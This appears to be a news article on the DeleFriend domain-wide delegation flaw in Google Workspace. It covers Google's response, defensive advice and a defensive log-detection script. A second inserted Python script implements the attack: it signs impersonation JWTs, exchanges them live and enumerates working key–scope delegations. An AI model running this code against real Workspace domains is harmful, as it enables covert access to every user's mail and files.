DeleFriend Vulnerability Could Permit Unwanted Access to APIs, According to Researchers


Hunters researchers noted the vulnerability could lead to privilege escalation. Google said the report “doesn’t identify an underlying security issue in our products.”

Cybersecurity researchers from the firm Hunters discovered a vulnerability in Google Workspace that could allow unwanted access to Workspace APIs. The flaw is significant in that it could let attackers use privilege escalation to gain access that would otherwise only be available to users with Super Admin privileges. Hunters named this security flaw DeleFriend.

Vulnerability found in Google’s domain-wide delegation

According to the Hunters team, the vulnerability stems from Google Workspace’s role in managing user identities across Google Cloud services. Domain-wide delegation connects identity objects from either Google Workspace Marketplace or a Google Cloud Platform service account to Workspace, letting that identity call Workspace APIs on behalf of any user in the domain.

Domain-wide delegation can be abused by attackers in two main ways: by creating a new delegation after having gained Super Admin privileges on the target Workspace environment through another attack, or by “enumerating successful combinations of service account keys and OAuth scopes,” Hunters said. This second way is the novel method the researchers discovered: an attacker who can create keys for service accounts in a GCP project does not need Workspace admin access at all, only an existing delegation that one of those service accounts already holds. Yonatan Khanashvili, threat hunting expert at Team Axon at Hunters, posted a much more detailed explanation of DeleFriend.

Response from Google

Hunters disclosed this flaw to Google in August 2023 and wrote, “Google is currently reviewing the issue with their Product team to assess potential actions based on our recommendations.”

An anonymous Google representative told The Hacker News in November 2023, “This report doesn’t identify an underlying security issue in our products. As a best practice, we encourage users to ensure all accounts have the least amount of privilege possible (see guidance here). Doing so is key to combating these types of attacks.”

Why this Google Workspace vulnerability is particularly dangerous

Hunters said this vulnerability is particularly dangerous because it is long-lived (user-managed GCP service account keys do not expire by default), easy to hide and hard to detect. Once holding a delegated token, attackers could potentially read emails in Gmail, view someone’s schedule in Google Calendar or exfiltrate data from Google Drive, for any user in the domain the delegation covers.

“The potential consequences of malicious actors misusing domain-wide delegation are severe. Instead of affecting just a single identity, as with individual OAuth consent, exploiting DWD with existing delegation can impact every identity within the Workspace domain,” said Khanashvili in the press release.

How to detect and defend against DeleFriend

In addition to ensuring privileges are set up properly, as Google notes, IT admins could create each service account in a separate project where possible, Hunters said, so that key-creation rights on one project do not reach every delegated service account at once. Other recommendations from Hunters to protect against DeleFriend exploitation are:

  • Limit OAuth scopes in delegations as much as possible, following the principle of least privilege.
  • Avoid administrative scopes such as https://www.googleapis.com/auth/admin.
  • Focus detection engineering and threat hunting on suspicious delegations and on multiple private key creations over a short period of time.
  • Maintain security posture and hygiene best practices.
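The two detection recommendations above, turned into working logic as an added example (this is not Hunters’ detection content): a burst of service account key creations by one principal, and newly authorized domain-wide delegations, flagged harder when they carry an admin scope. The method name `google.iam.admin.v1.CreateServiceAccountKey` and the event name `AUTHORIZE_API_CLIENT_ACCESS` are the documented Cloud Audit Logs and Admin SDK Reports API names; the exact record layout, the parameter names `API_CLIENT_NAME` / `API_SCOPES`, and all sample records are constructed assumptions to verify against your own exports.

```python
"""Added example (not Hunters' code): detect DeleFriend precursors in
constructed audit records."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Documented method / event names; record layout below is an assumption.
KEY_CREATE = "google.iam.admin.v1.CreateServiceAccountKey"
DWD_AUTHORIZE = "AUTHORIZE_API_CLIENT_ACCESS"
ADMIN_SCOPE_PREFIX = "https://www.googleapis.com/auth/admin"


def gcp_key_event(actor, sa, ts):
    """Constructed Cloud Audit Log entry for a key creation."""
    return {"timestamp": ts, "protoPayload": {
        "methodName": KEY_CREATE,
        "authenticationInfo": {"principalEmail": actor},
        "resourceName": f"projects/example-project/serviceAccounts/{sa}"}}


# Constructed sample input: one benign key creation, an attacker minting
# keys on three service accounts in four minutes, then a new delegation
# (Reports API admin-audit shape) that includes an admin scope.
SAMPLE_RECORDS = [
    gcp_key_event("devops@example.com", "ci@example-project.iam.gserviceaccount.com", "2023-11-27T09:00:00Z"),
    gcp_key_event("attacker@example.com", "sa-1@example-project.iam.gserviceaccount.com", "2023-11-28T10:00:00Z"),
    gcp_key_event("attacker@example.com", "sa-2@example-project.iam.gserviceaccount.com", "2023-11-28T10:02:00Z"),
    gcp_key_event("attacker@example.com", "sa-3@example-project.iam.gserviceaccount.com", "2023-11-28T10:04:00Z"),
    {"id": {"time": "2023-11-28T10:06:00Z", "applicationName": "admin"},
     "actor": {"email": "attacker@example.com"},
     "events": [{"name": DWD_AUTHORIZE, "parameters": [
         {"name": "API_CLIENT_NAME", "value": "103344556677889900112"},
         {"name": "API_SCOPES", "value": "https://www.googleapis.com/auth/admin.directory.user "
                                         "https://www.googleapis.com/auth/gmail.readonly"}]}]},
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def key_creation_bursts(records, threshold=3, window=timedelta(minutes=10)):
    """Flag any principal that creates `threshold` or more keys within `window`."""
    per_actor = defaultdict(list)
    for r in records:
        p = r.get("protoPayload") or {}
        if p.get("methodName") == KEY_CREATE:
            per_actor[p["authenticationInfo"]["principalEmail"]].append(
                (parse_ts(r["timestamp"]), p["resourceName"]))
    findings = []
    for actor, events in per_actor.items():
        events.sort()
        for i in range(len(events)):
            j = i  # extend the window forward from event i
            while j + 1 < len(events) and events[j + 1][0] - events[i][0] <= window:
                j += 1
            if j - i + 1 >= threshold:
                findings.append({"actor": actor, "start": events[i][0].isoformat(),
                                 "keys": [sa for _, sa in events[i:j + 1]]})
                break  # one finding per actor is enough to raise an alert
    return findings


def new_delegations(records):
    """Every new delegation deserves review; admin scopes are the ones the
    recommendations say to avoid outright."""
    findings = []
    for r in records:
        for ev in r.get("events", []):
            if ev.get("name") != DWD_AUTHORIZE:
                continue
            params = {p["name"]: p.get("value", "") for p in ev.get("parameters", [])}
            # Scope separator is an assumption; accept whitespace or commas.
            scopes = [s for s in re.split(r"[\s,]+", params.get("API_SCOPES", "")) if s]
            findings.append({"actor": r["actor"]["email"], "time": r["id"]["time"],
                             "client_id": params.get("API_CLIENT_NAME"), "scopes": scopes,
                             "admin_scope": any(s.startswith(ADMIN_SCOPE_PREFIX) for s in scopes)})
    return findings


if __name__ == "__main__":
    for finding in key_creation_bursts(SAMPLE_RECORDS) + new_delegations(SAMPLE_RECORDS):
        print(finding)
```

The burst rule is deliberately per principal rather than per service account, because the enumeration step described in the article creates one key on each of many service accounts; a per-account threshold would never fire. Tune `threshold` and `window` against a baseline of your own CI and IaC activity before alerting on it.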

Hunters created a proof-of-concept tool for running the DeleFriend exploitation method manually. The tool works by enumerating GCP projects using the Resource Manager API, iterating over the service account resources in each project, checking which roles and permissions the current identity holds on them, and creating new keys where it can, extracting the private key value from the privateKeyData attribute of the created key (Figure A). The end result is a JWT assertion signed with that key, which can be exchanged for a temporary access token that grants access to Google APIs as the impersonated user. Khanashvili’s blog post contains more detail.
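The mechanics the paragraph above describes (and the “enumerate successful combinations of service account keys and OAuth scopes” step mentioned earlier), as an added example that is not Hunters’ tool: decode a `privateKeyData` blob into the JSON key file, build the OAuth 2.0 JWT bearer assertion with the `sub` claim that makes Workspace act as the impersonated user, and walk key × scope combinations against the token endpoint. The sample key file is constructed and contains no real key; the `exchange` callable is injectable so the enumeration logic runs offline, and `google_token_exchange` is the live, network-using version. The `unauthorized_client` error text is what Google’s endpoint typically returns for a key with no matching delegation; treat that as an observation to confirm, not a contract.

```python
"""Added example (not Hunters' tool): the JWT bearer assertion behind
domain-wide delegation, and the key x scope enumeration built on it."""
import base64
import json
import time
import urllib.error
import urllib.parse
import urllib.request

GOOGLE_TOKEN_URI = "https://oauth2.googleapis.com/token"
JWT_BEARER = "urn:ietf:params:oauth:grant-type:jwt-bearer"

# Constructed sample: NOT a real key. privateKeyData from the IAM keys API is
# the base64 of this ordinary JSON key file.
SAMPLE_KEY_FILE = {
    "type": "service_account",
    "project_id": "example-project",
    "client_email": "sa-1@example-project.iam.gserviceaccount.com",
    "private_key": "-----BEGIN PRIVATE KEY-----\nPLACEHOLDER-NOT-A-KEY\n-----END PRIVATE KEY-----\n",
    "token_uri": GOOGLE_TOKEN_URI,
}
SAMPLE_PRIVATE_KEY_DATA = base64.b64encode(json.dumps(SAMPLE_KEY_FILE).encode()).decode()


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def parse_private_key_data(private_key_data: str) -> dict:
    """Decode the privateKeyData attribute into the JSON key file."""
    key_file = json.loads(base64.b64decode(private_key_data))
    missing = [f for f in ("client_email", "private_key") if f not in key_file]
    if missing:
        raise ValueError(f"key file is missing {missing}")
    return key_file


def build_assertion_claims(key_file, impersonate, scopes, now=None):
    """Claim set for the JWT bearer grant. `sub` is the whole point of
    domain-wide delegation: without it the token is the service account's
    own; with it, the token acts as that Workspace user."""
    now = int(time.time()) if now is None else now
    claims = {
        "iss": key_file["client_email"],
        "scope": " ".join(scopes),
        "aud": key_file.get("token_uri", GOOGLE_TOKEN_URI),
        "iat": now,
        "exp": now + 3600,  # Google rejects assertions valid for more than 1h
    }
    if impersonate:
        claims["sub"] = impersonate
    return claims


def signing_input(claims) -> str:
    """base64url(header).base64url(claims), the bytes RS256 signs."""
    header = {"alg": "RS256", "typ": "JWT"}
    enc = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    return f"{enc(header)}.{enc(claims)}"


def sign_assertion(key_file, claims) -> str:
    """RS256 over the signing input; needs the `cryptography` package and a
    real PEM private key (the sample placeholder will not load)."""
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import padding
    key = serialization.load_pem_private_key(key_file["private_key"].encode(), password=None)
    unsigned = signing_input(claims)
    sig = key.sign(unsigned.encode(), padding.PKCS1v15(), hashes.SHA256())
    return f"{unsigned}.{b64url(sig)}"


def google_token_exchange(key_file, claims):
    """Live exchange (network). Returns (True, token body) or (False, error
    body); a key with no matching delegation typically gets unauthorized_client."""
    body = urllib.parse.urlencode({"grant_type": JWT_BEARER,
                                   "assertion": sign_assertion(key_file, claims)}).encode()
    req = urllib.request.Request(claims["aud"], data=body, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return True, json.load(resp)
    except urllib.error.HTTPError as e:
        return False, json.loads(e.read() or b"{}")


def probe_combinations(key_files, scopes, impersonate, exchange=google_token_exchange, now=None):
    """The enumeration step: every (key, scope) pair the endpoint accepts is a
    working delegation the attacker can use as `impersonate`."""
    hits = []
    for kf in key_files:
        for scope in scopes:
            ok, _ = exchange(kf, build_assertion_claims(kf, impersonate, [scope], now))
            if ok:
                hits.append((kf["client_email"], scope))
    return hits


if __name__ == "__main__":
    kf = parse_private_key_data(SAMPLE_PRIVATE_KEY_DATA)
    claims = build_assertion_claims(kf, "ceo@example.com",
                                    ["https://www.googleapis.com/auth/gmail.readonly"], now=1700000000)
    print(json.dumps(claims, indent=2))
    print(signing_input(claims))
```

Two things to take from the shape of this code: the assertion is signed by the service account key alone, so nothing in the Workspace tenant is touched until the token endpoint is hit, and the probe is one cheap HTTP request per (key, scope) pair, which is why Hunters recommend hunting for the key-creation burst rather than waiting for a Workspace-side signal.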

Figure A (DeleFriend snippet, image: Hunters): Part of the DeleFriend exploit involves a key creation function that extracts the private key value from a privateKeyData attribute key, Hunters found.

The tool is intended for researchers to detect misconfigurations, and to “increase awareness around OAuth delegation attacks in GCP and Google Workspace and to improve the security posture of organizations that use the Domain-Wide-Delegation feature,” Hunters wrote.

Note: TechRepublic reached out to Google for more information.
